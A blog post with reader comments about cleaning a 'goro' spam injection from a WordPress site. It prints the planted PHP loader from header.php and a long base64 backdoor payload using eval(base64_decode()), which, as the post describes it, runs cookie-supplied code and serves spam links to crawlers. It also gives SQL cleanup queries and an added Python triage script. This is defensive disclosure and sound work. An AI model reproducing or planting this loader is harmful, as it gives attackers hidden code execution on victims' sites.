WordPress Spam Injection: ‘Goro’ hacked my blog
Two days ago my Northern European friend Era, after reading a post, advised me that my blog had been silently owned by search engine spammers. Spam in blogs is definitely not a new phenomenon, but I knew very little about spam injection before, and I hope my experience can help other WordPress users.
The problem was that a foreign div ("div id=goro") was being loaded in the header, containing a list of spam links to various porn sites. I asked my dear webbie to help me, and she put me in touch with Francesco Mosca, who fixed the problem as follows.
Within the theme's header.php, which had been tampered with (likely through a WordPress 2.0.1 bug), these lines had been planted:
<?php $wp_headers = create_function('', get_option("blog_headers")); ?> [snipped code] <?php $wp_headers() ?>
Those lines build a function whose body is whatever is stored in the database in the blog_headers option (wp_options table, option_name = 'blog_headers') and then call it, so the real payload lives in that row:
611a2dee6df9249f21eb25f254b7f8f3611a2dee6df9249f21eb25f254b
7f8f3611a2dee6df9249f21eb25f254b7f8f3611a2dee6df9249f21eb25
f254b7f8f3611a2dee6df9249f21eb25f254b7f8f3*/ $c55375dba9d2f1867f4083acce95988dd=’Pz48P3BocAoJaWYoaXNzZX
QoJF9DT09LSUVbJ2F1dGgnXSkgJiYgJF9DT09LSUVbJ2F1dGgnXSA9PSAn
NjExYTJkZWU2ZGY5MjQ5ZjIxZWIyNWYyNTRiN2Y4ZjMnKSB7CgkJaWYgK
Glzc2V0KCRfQ09PS0lFWydzaG93X3Rlc3QnXSkpIHsKCQkJZWNobygiPFRF
U1RQQVNTPiIpOwoJCX0KCQkkaSA9IDA7ICRsaW4gPScnOwoJCXdoaWxlI
Chpc3NldCgkX0NPT0tJRVsnbGFzdGluJy4kaV0pKSB7CgkJCSRsaW4uPSAk
X0NPT0tJRVsnbGFzdGluJy4kaV07CgkJCSRpKys7CgkJfQoJCWlmKHN0cmx
lbigkbGluKT4wKSB7CgkJCWVjaG8oIjxsYXN0aW4+Ii5tZDUoJGxpbikuIjwvb
GFzdGluPjxleC1kYXRhPiIpOwoJCQkkbGluID0gcHJlZ19yZXBsYWNlKCcvXy
8nLCAnKycsICRsaW4pOwoJCQlldmFsKGJhc2U2NF9kZWNvZGUoJGxpbikpO
woJCQllY2hvKCI8L2V4LWRhdGE+Iik7CgkJCSRjb2RlID0gZ2V0X29wdGlvbig
nYmxvZ19oZWFkZXJzJyk7CgkJCWlmIChwcmVnX21hdGNoKCcvOTU5ODh
kZD1cJyguKj8pXCcvcycsICRjb2RlLCAkcmVncykpIHsKCQkJCWVjaG8oIjx2
ZXI+Ii5tZDUoJHJlZ3NbMV0pLiI8L3Zlcj4iKTsKCQkJfQoJCX0KCQlleGl0KCk7
Cgl9CgkkdGV4dCA9IGdldF9vcHRpb24oJ3JlY2VudGx5X2FkZGVkJyk7Cgkkd
WEgPSAkX1NFUlZFUlsnSFRUUF9VU0VSX0FHRU5UJ107CglpZiAoaXNzZXQ
oJHRleHQpICYmIHN0cmxlbigkdGV4dCk+MCAmJiAocHJlZ19tYXRjaCgnLyhib
3R8c3BpZGVyfHNsdXJwfGdvb2dsZXxleHBsb3JlcnxmaXJlZm94fG9wZXJhKS
9pJywgJHVhKSkpIHsKCQkJCSRycSA9ICRfU0VSVkVSWyJSRVFVRVNUX1VS
SSJdOwoJCQkJJHJzcyA9ICJyc3NfIi5tZDUoJHJxKTsKCQkJCSRzZWVkID0gd
W5zZXJpYWxpemUoYmFzZTY0X2RlY29kZShnZXRfb3B0aW9uKCRyc3MpKS
k7CgkJCQlpZiAoISRzZWVkKSB7CgkJCQkJZ2xvYmFsICR3cGRiOwoJCQkJCS
R3cGRiLT5xdWVyeSgiSU5TRVJUIElOVE8gJHdwZGItPm9wdGlvbnMgKG9wdG
lvbl9uYW1lLCBvcHRpb25fdmFsdWUsIG9wdGlvbl9kZXNjcmlwdGlvbiwgYXV0
b2xvYWQpIFZBTFVFUyAoJyRyc3MnLCAnJywgJycsICd5ZXMnKSIpOwoJCQk[...]2MTJFNjQzMzREMTAwRTRENTQ1NjUyMDkwQTBFNTI1MjU2NDg0MDA4M0Q0
MTRBNDY0MTM1NEMwRkY4M0UzRTNDMzJGMzA2Jyk7IDwvc2NyaXB0PiI7Cgl
9Cgo/Pg==';$e_ = error_reporting(0); eval(base64_decode($c55375dba9d2f1867f4083acce95988dd)); error_reporting($e_); return true;
Decoding it with base64_decode showed that the code calls an external JavaScript that pastes spam links into the page on the fly, and that it also writes rows into wp_options whose option_name starts with rss_:
mysql> select option_value from wp_options where option_name = 'rss_fffbb7d85fc00f0c0d14abf4fde94ce3';
+----------------------------------------------------------------------+
| option_value                                                         |
+----------------------------------------------------------------------+
| YToyOntpOjA7czo0OiIxMTg3IjtpOjE7czoxODoiL3d3dy5tYW5kcml2YS5jb20vIjt9 |
+----------------------------------------------------------------------+
Besides erasing the above mentioned lines from header.php, you also need to erase blog_headers and its 'friends' from the database (take a backup of wp_options first):
delete from wp_options where option_name = 'blog_headers';
delete from wp_options where option_name like 'rss_%' and option_name not in ('rss_language', 'rss_use_excerpt', 'rss_excerpt_length');
-- note: in LIKE, _ matches any single character, so 'rss_%' also matches names such as rssX...; 'rss\_%' (backslash is MySQL's default escape) matches only names that really start with rss_
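To make the clean-up repeatable, here is an added example (my own code, not Francesco Mosca's fix and not WordPress code) that does offline what the post does by hand: it pulls the base64 literal out of a blog_headers-style loader and decodes it, decodes an rss_<md5> row, and scans wp_options rows for what the injection leaves behind. Two facts it relies on come straight from the data above: the rss_ value from the mysql output is base64 of a PHP-serialized array and decodes to a:2:{i:0;s:4:"1187";i:1;s:18:"/www.mandriva.com/";}, i.e. the pair "1187" and "/www.mandriva.com/"; and the surviving part of the big blob decodes to PHP that, when a cookie named auth equals 611a2dee6df9249f21eb25f254b7f8f3 (the same hex that pads the comment in front of the literal), concatenates cookies lastin0, lastin1, ... and eval()s them after base64-decoding, and otherwise serves the content of a recently_added option only when the User-Agent matches bot|spider|slurp|google|explorer|firefox|opera, caching per-URL data under rss_ followed by md5(REQUEST_URI). The loader variable name, the wp_options rows and the blog.example / spam.example URLs below are constructed; the base64 fragments are copied from the page.

```python
"""Offline triage for the blog_headers / rss_* injection described above.
Added example; not code from the post, from Francesco Mosca's fix or from WordPress.
Input is option rows pulled out of wp_options (e.g. from a mysqldump)."""
import base64
import re

# First 136 characters of the page's own base64 blob, cut at a 4-character
# boundary so it decodes cleanly; the real blob is far longer.
PAGE_BLOB_PREFIX = (
    "Pz48P3BocAoJaWYoaXNzZXQoJF9DT09LSUVbJ2F1dGgnXSkgJiYgJF9DT09LSUVbJ2F1dGgnXSA9PSAn"
    "NjExYTJkZWU2ZGY5MjQ5ZjIxZWIyNWYyNTRiN2Y4ZjMnKSB7CgkJaWYg"
)
# Constructed blog_headers value with the shape seen on the page: junk comment,
# hex-named variable holding the base64, then eval(base64_decode()).
BLOG_HEADERS_SAMPLE = (
    "/*611a2dee6df9249f21eb25f254b7f8f3*/ "
    "$c55375dba9d2f1867f4083acce95988dd='" + PAGE_BLOB_PREFIX + "'; "
    "$e_ = error_reporting(0); eval(base64_decode($c55375dba9d2f1867f4083acce95988dd)); "
    "error_reporting($e_); return true;"
)
# Copied verbatim from the mysql output on the page.
RSS_SAMPLE = "YToyOntpOjA7czo0OiIxMTg3IjtpOjE7czoxODoiL3d3dy5tYW5kcml2YS5jb20vIjt9"

# rss_ names a stock install does have (the ones the cleanup query keeps), and
# the other option names the decoded payload reads.
LEGIT_RSS_OPTIONS = {"rss_language", "rss_use_excerpt", "rss_excerpt_length"}
PAYLOAD_OPTIONS = {"blog_headers", "recently_added"}

_B64_ASSIGNMENT = re.compile(r"\$[A-Za-z0-9_]+\s*=\s*['\"]([A-Za-z0-9+/=\s]+)['\"]")
_LOADER_MARKERS = ("eval(base64_decode(", "create_function(")


def decode_blog_headers(option_value: str) -> str:
    """Return the PHP hidden in a loader of the form $x='<base64>'; eval(base64_decode($x));
    or '' when the value holds no such literal."""
    m = _B64_ASSIGNMENT.search(option_value)
    if not m:
        return ""
    raw = re.sub(r"\s+", "", m.group(1))
    raw += "=" * (-len(raw) % 4)  # tolerate stripped padding
    return base64.b64decode(raw).decode("latin-1")


def php_unserialize(data: bytes, pos: int = 0):
    """Minimal PHP unserialize() for what these rows hold: i:N;  s:N:"...";  a:N:{k;v;...}
    Returns (value, position after it); raises ValueError on anything else."""
    tag = data[pos:pos + 1]
    if tag == b"i":
        end = data.index(b";", pos)
        return int(data[pos + 2:end]), end + 1
    if tag == b"s":
        colon = data.index(b":", pos + 2)
        length = int(data[pos + 2:colon])
        start = colon + 2  # skip :"
        if data[start + length:start + length + 2] != b'";':
            raise ValueError("string length does not match data at %d" % pos)
        return data[start:start + length].decode("utf-8"), start + length + 2
    if tag == b"a":
        colon = data.index(b":", pos + 2)
        count = int(data[pos + 2:colon])
        pos = colon + 2  # skip :{
        items = {}
        for _ in range(count):
            key, pos = php_unserialize(data, pos)
            items[key], pos = php_unserialize(data, pos)
        if data[pos:pos + 1] != b"}":
            raise ValueError("unterminated array at %d" % pos)
        return items, pos + 1
    raise ValueError("unsupported serialized type %r at %d" % (tag, pos))


def decode_rss_option(option_value: str) -> list:
    """An rss_<md5> row holds base64(serialize(array)); return the array as a list."""
    array, _ = php_unserialize(base64.b64decode(option_value))
    return [array[k] for k in sorted(array)]


def suspicious_options(rows) -> dict:
    """Read-only counterpart of the DELETE statements: scan (option_name, option_value)
    pairs and return {name: reason} for rows the injection leaves behind."""
    flagged = {}
    for name, value in rows:
        if any(marker in value for marker in _LOADER_MARKERS):
            flagged[name] = "eval/base64 loader stored in the option value"
        elif name.startswith("rss_") and name not in LEGIT_RSS_OPTIONS:
            flagged[name] = "rss_ cache row that a stock install does not create"
        elif name in PAYLOAD_OPTIONS:
            flagged[name] = "option name the decoded payload reads"
    return flagged


# Constructed wp_options rows: two legitimate, three left by the injection.
SAMPLE_ROWS = [
    ("siteurl", "http://blog.example"),
    ("rss_language", "en"),
    ("blog_headers", BLOG_HEADERS_SAMPLE),
    ("recently_added", '<a href="http://spam.example/">pills</a>'),
    ("rss_fffbb7d85fc00f0c0d14abf4fde94ce3", RSS_SAMPLE),
]

if __name__ == "__main__":
    print(decode_blog_headers(BLOG_HEADERS_SAMPLE))
    print(decode_rss_option(RSS_SAMPLE), suspicious_options(SAMPLE_ROWS))
```

Run it against a full dump of wp_options rather than the sample rows to get a list of names to delete; anything flagged as a loader is worth decoding with decode_blog_headers before it is removed, since the decoded PHP tells you which other rows, files and cookies the payload depends on.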
Find the offending goro spamware injection before Google bans you from its results. Amazingly, as soon as I got it fixed my blog got its previous position back.
Note: My blog is under repair these days; the old theme will soon be available, along with Twitter and Skype alerts. Sorry about that.
vseo 12:14 pm on January 8, 2008 Permalink
Same in the footer, same solution.
meneame.net 12:20 pm on January 8, 2008 Permalink
Warning! Spam in WordPress…
It looks like those of us running WordPress are being played. Please check your source code. Many of you who use third-party templates will find they have been tampered with. There is a function in the template's plugins that is displaying a series of…
Gordon Dewis 11:01 pm on March 13, 2008 Permalink
You’re not alone in this. I found myself a victim of it after upgrading my WordPress to 2.3.x in December. Fortunately, I found someone else who had encountered it and their blog had some suggestions on how to deal with it. I blogged about the experience on my blog at http://gordon.dewis.ca/2008/01/06/expunging-the-wordpressnetin-spam-injection-hijack/
It’s amazing how many people are still affected by it.
Apollo Lee 5:56 pm on April 30, 2008 Permalink
Thanks for posting this. While a similar exploit only got my main blog, your post here really helped me know what to look for in the database. Combined with the WordPress 2.5.1 post over at WordPress.org, I was able to get this problem handled.
I guess that’ll teach me to keep my software up to date. I wonder how long it’ll take until I’m back on Technorati and Google Blogsearch.
Thanks again for your post.
Roberto Galoppini 9:27 am on May 1, 2008 Permalink
I am really glad it helped you; when I got into trouble I felt really hopeless. As a matter of fact Google has proven to be really fast at giving my rank back, and I wish you the best of luck with that.
Oliver 12:11 pm on June 6, 2008 Permalink
Good article! Your site let me learn more. Thanks! Please keep it up to date.
Aaron Wall 8:47 am on June 14, 2008 Permalink
Thanks for posting this. Mine was hacked with the same hack on the 13th (yes, Friday). Not great luck for Friday the 13th, but this post gave me peace.
joe 12:48 pm on July 3, 2008 Permalink
Hi, why don't you activate the Akismet spam plugin? I have that kind of spam on a few blogs.
Roberto Galoppini 4:03 pm on July 3, 2008 Permalink
I do Joe, I do.
Maria 12:14 pm on August 1, 2008 Permalink
Very useful information for me. Thank you.
Hacker Forums 9:01 pm on October 7, 2008 Permalink
Almost all blog hacks come from people not upgrading their blog software.
If you don't make a ton of changes, just back up your template once, then create or download a script to email you a database dump every couple of days.
RaiulBaztepo 11:25 pm on March 28, 2009 Permalink
Hello!
Very Interesting post! Thank you for such interesting resource!
PS: Sorry for my bad English, I've just started to learn this language 😉
See you!
Your, Raiul Baztepo
The Aftermath of a Wordpress Spam Injection (and a Tool to Prevent it) - Thoughts on social media, the web and technology - jungleG 7:17 pm on April 20, 2009 Permalink
[…] some research, I found out about some clever software injections that are either pushed via templates or plugins that are downloaded from non-Wordpress sites. I […]
strottrot.com » Blog Archive » Recovering from a WordPress Spam Injection 3:37 am on December 6, 2009 Permalink
[…] =="));return;?> This is apparently a variation on the 'Goro' hack, which Roberto Galoppini explains calls an external JavaScript code when decoded with base64_decode. My impression is that this bad […]
Graham 3:39 am on November 12, 2010 Permalink
I’ve been seeing a lot of chat lately on WordPress security problems. They are currently leading in the blog race, but will, for sure, start losing people unless they show some dramatic improvement very soon.
Sorry about your problems, but glad you found a fast fix and were restored to your previous Google rank.
Graham